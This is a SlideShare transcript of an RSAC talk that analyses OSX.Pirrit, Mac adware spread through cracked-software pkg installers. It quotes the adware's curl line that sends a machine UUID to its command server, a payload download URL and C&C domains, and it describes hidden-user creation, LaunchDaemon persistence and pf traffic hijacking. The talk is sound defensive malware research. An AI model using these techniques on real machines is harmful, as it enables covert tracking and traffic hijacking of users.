SlideShare a Scribd company logo
1 of 60
Download to read offline
#RSAC
OSX Pirrit:
Why You Should Care About Malicious
Mac Adware
Amit Serper
Principal security researcher, Cybereason,
#RSAC
OSX.Pirrit
2
#RSAC
$ whoami
3
• Amit Serper (What’s with the weird name, dude?)
• Principal security researcher @ Cybereason
Low level research (Kernel, reversing, etc...)
Writing poorly programmed attack simulation tools (crappy coder)
Malware research
HackingTeam server research (with @awfrazer):
Slides: http://hackedteam.lol
Paper: http://ht-paper.amit.wtf
Blogs: http://ht1.amit.wtf, http://ht2.amit.wtf
Lead security researcher @ Israeli government agency (9 years)
<REDACTED>
Follow me on twitter: @0xAmit
#RSAC
$ cat /Users/amit/agenda.txt
4
1. For those that weren’t around 15 years ago: Intro to adware
2. This apple is getting ripe: Adware on Mac
3. OSX.Pirrit
4. How they messed up
#RSAC
Intro to Adware
5
• Adware usually gets to your machine with installers.
• These installers install a program that you downloaded and then offer
you to add some other program that will enhance your expirience
#RSAC
Intro to Adware
6
1. Software that resides on one’s machine and displays ads
2. Adware divide into several categories:
• Plain and stupid – Just displays popups without any context
• The “norm” – Displays banners (and rarely popups) according to basic metrics
that are gathered from the browser
• The black-ops operative – Installs a hidden program that can see your entire
traffic, injects ads to pages you visit and even over-rides legitimate ads that
were put there in the first place (That’s stealing!)
#RSAC
Adware on the Mac
7
1. Similar to windows, adware to OS X comes usually in the form of
toolbars
2. These toolbars are safari plugins – like Spigot…
#RSAC
Adware on the Mac
8
1. Similar to windows, adware to OS X comes usually in the form of
toolbars
2. These toolbars are safari plugins – like Spigot…
3. Spigot also installs LaunchAgents!
http://www.thesafemac.com/arg-spigot
#RSAC
The story begins…
9
• An irc user “Xiano” popped in to #osxre @ freenode and told us that his
friend’s mac is acting weird
• He said that internet browsing is rather slow and some weird processes are
showing up.
• He then shared with us a weird executable called “sizzling”.
• Another channel member, “Paraxor” started reversing that executable and
quoted some function names
• It was immediately clear that this is some sort of adware because of these
strings
#RSAC
The story begins…
10
#RSAC
Qt?
• Qt (pronounced cute) is a cross-platform application
development framework
• Allows a developer to maintain a single codebase for an
application that will run on Windows, Linux, Mac and other
platforms…
• The ”cost” of that are a lot of external libraries that are
linked with your application
#RSAC
The story begins… (continued)
http://forums.macrumors.com/threads/what-is-unillumination-process-mavericks.1966015/
#RSAC
#RSAC
#RSAC
#RSAC
Let’s look at the binary (strings table)
#RSAC
Another URL in the strings table
#RSAC
Let’s google that url…
http://shorte.st/st/2904deaf2db062b776f39f499bf88ad9/%1
Gives 1 result to a JoeSandbox analysis of a Windows PE executable
#RSAC
Shorte.st – URL shortening service
#RSAC
Let’s Google that….
#RSAC
Let’s look at the script – rec_script.sh
#RSAC
Windows is easy…
#RSAC
But removal instructions for mac?
What is… “No”.
#RSAC
Xiano was back with more…
• He found an app bundle called “DemoUpdater”
on his friend’s machine.
• He mentioned that this app bundle was
running under a different user which he did not
know.
• Inside the app bundle was a x64 Mach-O binary
executable and a shell script called Update2.sh.
• This was far more interesting.
#RSAC
In the executable - Suspicious functions and strings galore!
#RSAC
Mysterious domains
*.93a555685cc7443a8e1034efa1f18924.com
*.aa625d84f1587749c1ab011d6f269f7d64.com
*.2ff328dcee054f2f9a9a5d7e966e3ec0.com
*.aae219721390264a73aa60a5e6ab6ccc4e.com
#RSAC
And also… Some more windows crap
#RSAC
But what about that update2 shell script?
• When the executable finishes running, it executes Update2.sh
• It’s a HUGE script (330 lines) – it even has some inline python code (python –c)
Gets the machine uuid via command line (ioreg, parses its huge output with awk and grep)
Sends the machine ID to a server in order to get a new ID back from the server by issuing a curl
command:
curl "http://93a555685cc7443a8e1034efa1f18924.com/v/cld?mid=<UUID>&ct=pd"
It validates your geolocation by curl’ing ipinfo.io/country and checks that you are from US, UK, Spain,
Australia, France, Germany, India, Italy, Netherlands or New Zealand in order to download a different
“ad package”.
It’s updating the C&C and telling it that the installation was successful, it uses the uuid as an
identifier.
After the C&C was notified, the script will download and install another program called
“DemoInjector”
#RSAC
So here’s what we know until now
• It’s an adware
• It generates traffic
• It’s cross-platform
• It’s definitely trying to hide strings and domains inside the binary
• It adds a hidden user with a weird name – it has to get root access
• It runs weird processes with strange names
• It has a componenet called “DemoUpdater”
#RSAC
But here’s what no one knows
How the hell did people get infected?!
#RSAC
FLASH FORWARD!
#RSAC
FLASH FORWARD!
#RSAC
• Mac equivalent of the MSI (Installer file)
• An extensible archive format (XAR)
• Has a nice wizard with useful EULA messages
• Can be signed with a developer certificate
• Has the ability to run pre/post install scripts!
PKG file?
#RSAC
• Pkg files are a very convenient way to drop
malware
• You can codesign them
• And you can just use the scripting features to do
whatever you want to.
PKG file!
#RSAC
PKG file – Suspicious package
http://www.mothersruin.com/software/SuspiciousPackage/
#RSAC
PKG file – Suspicious package
#RSAC
Let’s Look at this Script
#RSAC
Entire Process
User downloads
crack
Gets pkg
Pre install script
runs
Script
downlodas
“DemoUpdater”
component
DemoUpdater
prepares the
infrastructure
for
DemoInjector
Profit!
#RSAC
DemoUpdater
• DemoUpdater is the first component that’s actually being installed by Pirrit.
• This is the component that lays the groundwork for the traffic hijacking proxy
• This is the script that generates the strange names
• After a random name was generated, it is being written to com.common.plist
• It then creates another plist to hold its preferences. That plist is created with a
random name on each install (com.<RANDOMWORD>.preferences.plist)
#RSAC
DemoUpdater
• The script then carries on with creating the DemoUpdater bundle and
executable while not forgetting to change its name to make detection harder
• It then downloads the next component, DemoInjector and adding a
LaunchDaemon for it.
#RSAC
Wait… LaunchDaemons?
• A LaunchDaemon is an autorun in Mac speak
• It loads when the computer boots
• And just like everything in OS X, it’s also stored in a plist file
#RSAC
The soil is ready… Now – plant the seed
• After all of the basic building blocks were layed, it is time for the main
event
• We have a random name generated for DemoUpdater
• We have an autorun set up for DemoUpdater
• Now it’s time to get the proxy and get crackin’!
• The proxy is DemoInjector (remember it from before?)
• It will be downloaded from:
"http://93a555685cc7443a8e1034efa1f18924.com/static/pd_files/dit3.tgz
• The number in the tgz file is incremental – different version
• The latest version of DemoInjector is dit8 and it is from April 10th 2016.
#RSAC
The soil is ready… Now – plant the seed
• The proxy is called DemoInjector.
• It is also a QT project.
• It also has a lot of shell scripts!
• The most interesting one is install_injector.sh
• It also generates a random company name and
executable name
• And it creates a hidden user!
#RSAC
A hidden user… Oh my!
#RSAC
Hide500Users?
#RSAC
Someone was reading Apple documentation 
https://support.apple.com/en-il/HT203998
#RSAC
Someone was reading Apple documentation 
#RSAC
Another LaunchDaemon, this time for DemoInjector
#RSAC
And now – Traffic redirection!
• DemoInjector is listening on 127.0.0.1:9882
• All of the packets that are generated by everyone but $HIDDEN_USERS are
forwarded to DemoInjector using pf
• These settings also exist in another file that is dropped by the installer, called
/etc/change_net_settings. There’s also a LaunchDaemon for that!
#RSAC
Aaaaand… Profit!
#RSAC
Droppers… Droppers everywhere!
#RSAC
Uncovering the perpetrators
• Like all good things… It happened totally by accident!
• I just got a fresh sample of another OSX/Pirrit installer
• As I was too lazy to disable the AV inside my OSX vm, I
decided that I should just list the files inside the
archive
#RSAC
Uncovering the perpetrators
#RSAC
A quick LinkedIn search for the name…
#RSAC
TargetingEdge? Boy… Their product sounds just like Pirrit!
#RSAC
Buzz is created!
• About 40 different papers/news site cover OSX/pirrit
• Including: ThreatPost, Ars Technica, SC Magazine and
more…
• All of them asked for TargetingEdge’s response.
• None got it. But one.
#RSAC
Calcalist – Isreal’s ‘The Economist’
TargetingEdge’s response (translated from Hebrew):
“We’ve read Cybereason’s highly inaccurate PR report. Among many wrong
details that are weaved all across their report, it is important to note that the
code featured in CR’s report does not belong to TargetingEdge but to an
Eastern European company…”
Now, who do YOU believe?
#RSAC
P.S – this is awesome… Exhibit B - CV
#RSAC
Conclusion
#RSAC
Thanks!
• PATRICK WARDLE / OBJECTIVE-SEE.COM /
@PATRICKWARDLE
• My pals from Cybereason for the moral support
YOU!

More Related Content

What's hot

BlueHat v18 || Linear time shellcode detection using state machines and opera...
BlueHat v18 || Linear time shellcode detection using state machines and opera...BlueHat v18 || Linear time shellcode detection using state machines and opera...
BlueHat v18 || Linear time shellcode detection using state machines and opera...BlueHat Security Conference
 
Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...
Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...
Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...Liang Chen
 
Ruxcon 2014 - Stefan Esser - iOS8 Containers, Sandboxes and Entitlements
Ruxcon 2014 - Stefan Esser - iOS8 Containers, Sandboxes and EntitlementsRuxcon 2014 - Stefan Esser - iOS8 Containers, Sandboxes and Entitlements
Ruxcon 2014 - Stefan Esser - iOS8 Containers, Sandboxes and EntitlementsStefan Esser
 
Csw2016 wang docker_escapetechnology
Csw2016 wang docker_escapetechnologyCsw2016 wang docker_escapetechnology
Csw2016 wang docker_escapetechnologyCanSecWest
 
Captain Hook: Pirating AVs to Bypass Exploit Mitigations
Captain Hook: Pirating AVs to Bypass Exploit MitigationsCaptain Hook: Pirating AVs to Bypass Exploit Mitigations
Captain Hook: Pirating AVs to Bypass Exploit MitigationsenSilo
 
Open source security tools for Kubernetes.
Open source security tools for Kubernetes.Open source security tools for Kubernetes.
Open source security tools for Kubernetes.Michael Ducy
 
Advanced Weapons Training for the Empire
Advanced Weapons Training for the EmpireAdvanced Weapons Training for the Empire
Advanced Weapons Training for the EmpireJeremy Johnson
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCanSecWest
 
BlackHat USA 2011 - Stefan Esser - iOS Kernel Exploitation
BlackHat USA 2011 - Stefan Esser - iOS Kernel ExploitationBlackHat USA 2011 - Stefan Esser - iOS Kernel Exploitation
BlackHat USA 2011 - Stefan Esser - iOS Kernel ExploitationStefan Esser
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCanSecWest
 
Nsa and vpn
Nsa and vpnNsa and vpn
Nsa and vpnantitree
 
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...Positive Hack Days
 
Process injection - Malware style
Process injection - Malware styleProcess injection - Malware style
Process injection - Malware styleSander Demeester
 
Hacking - high school intro
Hacking - high school introHacking - high school intro
Hacking - high school introPeter Hlavaty
 
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox -  AMS 2011 , Spying on SpyEye - What Lies Beneath ?HackInTheBox -  AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?Aditya K Sood
 
TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)Mike Felch
 

What's hot (20)

The FatRat
The FatRatThe FatRat
The FatRat
 
App armor structure
App armor structureApp armor structure
App armor structure
 
BlueHat v18 || Linear time shellcode detection using state machines and opera...
BlueHat v18 || Linear time shellcode detection using state machines and opera...BlueHat v18 || Linear time shellcode detection using state machines and opera...
BlueHat v18 || Linear time shellcode detection using state machines and opera...
 
Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...
Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...
Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...
 
Ruxcon 2014 - Stefan Esser - iOS8 Containers, Sandboxes and Entitlements
Ruxcon 2014 - Stefan Esser - iOS8 Containers, Sandboxes and EntitlementsRuxcon 2014 - Stefan Esser - iOS8 Containers, Sandboxes and Entitlements
Ruxcon 2014 - Stefan Esser - iOS8 Containers, Sandboxes and Entitlements
 
Csw2016 wang docker_escapetechnology
Csw2016 wang docker_escapetechnologyCsw2016 wang docker_escapetechnology
Csw2016 wang docker_escapetechnology
 
Captain Hook: Pirating AVs to Bypass Exploit Mitigations
Captain Hook: Pirating AVs to Bypass Exploit MitigationsCaptain Hook: Pirating AVs to Bypass Exploit Mitigations
Captain Hook: Pirating AVs to Bypass Exploit Mitigations
 
Open source security tools for Kubernetes.
Open source security tools for Kubernetes.Open source security tools for Kubernetes.
Open source security tools for Kubernetes.
 
Advanced Weapons Training for the Empire
Advanced Weapons Training for the EmpireAdvanced Weapons Training for the Empire
Advanced Weapons Training for the Empire
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
 
BlackHat USA 2011 - Stefan Esser - iOS Kernel Exploitation
BlackHat USA 2011 - Stefan Esser - iOS Kernel ExploitationBlackHat USA 2011 - Stefan Esser - iOS Kernel Exploitation
BlackHat USA 2011 - Stefan Esser - iOS Kernel Exploitation
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
 
Nsa and vpn
Nsa and vpnNsa and vpn
Nsa and vpn
 
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...
 
Ntxissacsc5 red 1 &amp; 2 basic hacking tools ncc group
Ntxissacsc5 red 1 &amp; 2   basic hacking tools ncc groupNtxissacsc5 red 1 &amp; 2   basic hacking tools ncc group
Ntxissacsc5 red 1 &amp; 2 basic hacking tools ncc group
 
Process injection - Malware style
Process injection - Malware styleProcess injection - Malware style
Process injection - Malware style
 
Hacking - high school intro
Hacking - high school introHacking - high school intro
Hacking - high school intro
 
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox -  AMS 2011 , Spying on SpyEye - What Lies Beneath ?HackInTheBox -  AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
 
TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)
 
ShinoBOT Suite
ShinoBOT SuiteShinoBOT Suite
ShinoBOT Suite
 

Similar to OSX Pirrit : Why you should care about malicious mac adware

How Smart Thermostats Have Made Us Vulnerable
How Smart Thermostats Have Made Us VulnerableHow Smart Thermostats Have Made Us Vulnerable
How Smart Thermostats Have Made Us VulnerableRay Potter
 
VB2013 - Security Research and Development Framework
VB2013 - Security Research and Development FrameworkVB2013 - Security Research and Development Framework
VB2013 - Security Research and Development FrameworkAmr Thabet
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsChris Gates
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackPriyanka Aash
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackPriyanka Aash
 
EMBA - Firmware analysis - Black Hat Arsenal USA 2022
EMBA - Firmware analysis - Black Hat Arsenal USA 2022EMBA - Firmware analysis - Black Hat Arsenal USA 2022
EMBA - Firmware analysis - Black Hat Arsenal USA 2022MichaelM85042
 
DockerDay2015: Keynote
DockerDay2015: KeynoteDockerDay2015: Keynote
DockerDay2015: KeynoteDocker-Hanoi
 
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022MichaelM85042
 
Monitoring as Code: Getting to Monitoring-Driven Development - DEV314 - re:In...
Monitoring as Code: Getting to Monitoring-Driven Development - DEV314 - re:In...Monitoring as Code: Getting to Monitoring-Driven Development - DEV314 - re:In...
Monitoring as Code: Getting to Monitoring-Driven Development - DEV314 - re:In...Amazon Web Services
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...EC-Council
 
Ops for NoOps - Operational Challenges for Serverless Apps
Ops for NoOps - Operational Challenges for Serverless AppsOps for NoOps - Operational Challenges for Serverless Apps
Ops for NoOps - Operational Challenges for Serverless AppsErica Windisch
 
Hacking your Droid (Aditya Gupta)
Hacking your Droid (Aditya Gupta)Hacking your Droid (Aditya Gupta)
Hacking your Droid (Aditya Gupta)ClubHack
 
Higher Level Malware
Higher Level MalwareHigher Level Malware
Higher Level MalwareCTruncer
 
Advanced SOHO Router Exploitation XCON
Advanced SOHO Router Exploitation XCONAdvanced SOHO Router Exploitation XCON
Advanced SOHO Router Exploitation XCONLyon Yang
 
Large-scaled Deploy Over 100 Servers in 3 Minutes
Large-scaled Deploy Over 100 Servers in 3 MinutesLarge-scaled Deploy Over 100 Servers in 3 Minutes
Large-scaled Deploy Over 100 Servers in 3 MinutesHiroshi SHIBATA
 
Order vs. Mad Science: Analyzing Black Hat Swarm Intelligence
Order vs. Mad Science: Analyzing Black Hat Swarm IntelligenceOrder vs. Mad Science: Analyzing Black Hat Swarm Intelligence
Order vs. Mad Science: Analyzing Black Hat Swarm IntelligencePriyanka Aash
 
Owning computers without shell access dark
Owning computers without shell access darkOwning computers without shell access dark
Owning computers without shell access darkRoyce Davis
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...Zoltan Balazs
 

Similar to OSX Pirrit : Why you should care about malicious mac adware (20)

How Smart Thermostats Have Made Us Vulnerable
How Smart Thermostats Have Made Us VulnerableHow Smart Thermostats Have Made Us Vulnerable
How Smart Thermostats Have Made Us Vulnerable
 
RSA APJ Velociraptor Lab
RSA APJ Velociraptor LabRSA APJ Velociraptor Lab
RSA APJ Velociraptor Lab
 
VB2013 - Security Research and Development Framework
VB2013 - Security Research and Development FrameworkVB2013 - Security Research and Development Framework
VB2013 - Security Research and Development Framework
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac Attack
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac Attack
 
EMBA - Firmware analysis - Black Hat Arsenal USA 2022
EMBA - Firmware analysis - Black Hat Arsenal USA 2022EMBA - Firmware analysis - Black Hat Arsenal USA 2022
EMBA - Firmware analysis - Black Hat Arsenal USA 2022
 
DockerDay2015: Keynote
DockerDay2015: KeynoteDockerDay2015: Keynote
DockerDay2015: Keynote
 
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
 
Monitoring as Code: Getting to Monitoring-Driven Development - DEV314 - re:In...
Monitoring as Code: Getting to Monitoring-Driven Development - DEV314 - re:In...Monitoring as Code: Getting to Monitoring-Driven Development - DEV314 - re:In...
Monitoring as Code: Getting to Monitoring-Driven Development - DEV314 - re:In...
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
 
Ops for NoOps - Operational Challenges for Serverless Apps
Ops for NoOps - Operational Challenges for Serverless AppsOps for NoOps - Operational Challenges for Serverless Apps
Ops for NoOps - Operational Challenges for Serverless Apps
 
Hacking your Droid (Aditya Gupta)
Hacking your Droid (Aditya Gupta)Hacking your Droid (Aditya Gupta)
Hacking your Droid (Aditya Gupta)
 
Higher Level Malware
Higher Level MalwareHigher Level Malware
Higher Level Malware
 
Advanced SOHO Router Exploitation XCON
Advanced SOHO Router Exploitation XCONAdvanced SOHO Router Exploitation XCON
Advanced SOHO Router Exploitation XCON
 
Large-scaled Deploy Over 100 Servers in 3 Minutes
Large-scaled Deploy Over 100 Servers in 3 MinutesLarge-scaled Deploy Over 100 Servers in 3 Minutes
Large-scaled Deploy Over 100 Servers in 3 Minutes
 
Order vs. Mad Science: Analyzing Black Hat Swarm Intelligence
Order vs. Mad Science: Analyzing Black Hat Swarm IntelligenceOrder vs. Mad Science: Analyzing Black Hat Swarm Intelligence
Order vs. Mad Science: Analyzing Black Hat Swarm Intelligence
 
Owning computers without shell access dark
Owning computers without shell access darkOwning computers without shell access dark
Owning computers without shell access dark
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
 

More from Priyanka Aash

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsPriyanka Aash
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfPriyanka Aash
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfPriyanka Aash
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfPriyanka Aash
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfPriyanka Aash
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfPriyanka Aash
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfPriyanka Aash
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdfPriyanka Aash
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfPriyanka Aash
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfPriyanka Aash
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfPriyanka Aash
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldPriyanka Aash
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksPriyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Priyanka Aash
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsPriyanka Aash
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security GovernancePriyanka Aash
 

More from Priyanka Aash (20)

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdf
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdf
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdf
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdf
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
 
DPDP Act 2023.pdf
DPDP Act 2023.pdfDPDP Act 2023.pdf
DPDP Act 2023.pdf
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdf
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdf
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdf
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdf
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 Battlefield
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware Attacks
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
